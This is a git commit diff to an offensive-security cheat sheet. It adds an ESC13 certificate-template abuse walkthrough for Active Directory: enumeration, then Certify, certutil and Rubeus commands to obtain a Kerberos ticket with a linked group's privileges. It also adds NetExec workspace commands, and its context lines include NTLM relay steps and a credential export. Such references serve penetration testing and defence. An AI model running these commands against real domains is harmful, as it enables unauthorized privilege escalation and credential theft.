ESC13 + NetExec workspaces

pull/5/head
Swissky 2024-02-18 19:15:13 +01:00
parent 59791e0c9f
commit 219f0bfff0
2 changed files with 70 additions and 2 deletions

View File

@ -301,13 +301,15 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci
## ESC11 - Relaying NTLM to ICPR ## ESC11 - Relaying NTLM to ICPR
> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue > Encryption is not enforced for ICPR requests and Request Disposition is set to Issue.
Requirements: Requirements:
* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork * [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork
* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork * [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork
Exploitation: Exploitation:
1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output 1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output
2. Setup a relay using Impacket ntlmrelay and trigger a connection to it. 2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.
```ps1 ```ps1
@ -315,6 +317,58 @@ Exploitation:
``` ```
## ESC13 - Issuance Policy
> If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
**Requirements**
* The principal has enrollment rights on a certificate template
* The certificate template has an issuance policy extension
* The issuance policy has an OID group link to a group
* The certificate template defines EKUs that enable client authentication
```ps1
PS C:\> $ESC13Template = Get-ADObject "CN=ESC13Template,$TemplateContainer" -Properties nTSecurityDescriptor $ESC13Template.nTSecurityDescriptor.Access | ? {$_.IdentityReference -eq "DUMPSTER\ESC13User"}
AccessControlType : Allow
# check if there is an issuance policy in the msPKI-Certificate-Policy
PS C:\> Get-ADObject "CN=ESC13Template,$TemplateContainer" -Properties msPKI-Certificate-Policy
msPKI-Certificate-Policy : {1.3.6.1.4.1.311.21.8.4571196.1884641.3293620.10686285.12068043.134.3651508.12319448}
# check for OID group link
PS C:\> Get-ADObject "CN=12319448.2C2B96A74878E00434BEDD82A61861C5,$OIDContainer" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink
msDS-OIDToGroupLink : CN=ESC13Group,OU=Groups,OU=Tier0,DC=dumpster,DC=fire
# verify if ESC13Group is a Universal group
PS C:\> Get-ADGroup ESC13Group -Properties Members
GroupScope : Universal
Members : {}
```
**Exploitation**:
* Request a certificate for the vulnerable template
```ps1
PS C:\> .\Certify.exe request /ca:DC01\dumpster-DC01-CA /template:ESC13Template
```
* Merge into a PFX file
```ps1
PS C:\> certutil -MergePFX .\esc13.pem .\esc13.pfx
```
* Verify the presence of the "Client Authentication" and the "Policy Identifier"
```ps1
PS C:\> certutil -Dump -v .\esc13.pfx
```
* Ask a TGT for our user, but we are also member of the linked group and inherited their privileges
```ps1
PS C:\> .\Rubeus.exe asktgt /user:ESC13User /certificate:C:\esc13.pfx /nowrap
```
## Certifried CVE-2022-26923 ## Certifried CVE-2022-26923
> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege. > An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
@ -428,4 +482,5 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
* [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates) * [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates)
* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) * [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration)
* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) * [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls)
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) * [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
* [ADCS ESC13 Abuse Technique - Jonas Bülow Knudsen - 02/15/2024](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)

View File

@ -24,4 +24,17 @@ cmedb (test) > workspace default
cmedb (test) > proto smb cmedb (test) > proto smb
cmedb (test)(smb) > creds cmedb (test)(smb) > creds
cmedb (test)(smb) > export creds csv /tmp/creds cmedb (test)(smb) > export creds csv /tmp/creds
```
NetExec workspaces
```ps1
# get current workspace
poetry run nxcdb -gw
# create workspace
poetry run nxcdb -cw testing
# set workspace
poetry run nxcdb -sw testing
``` ```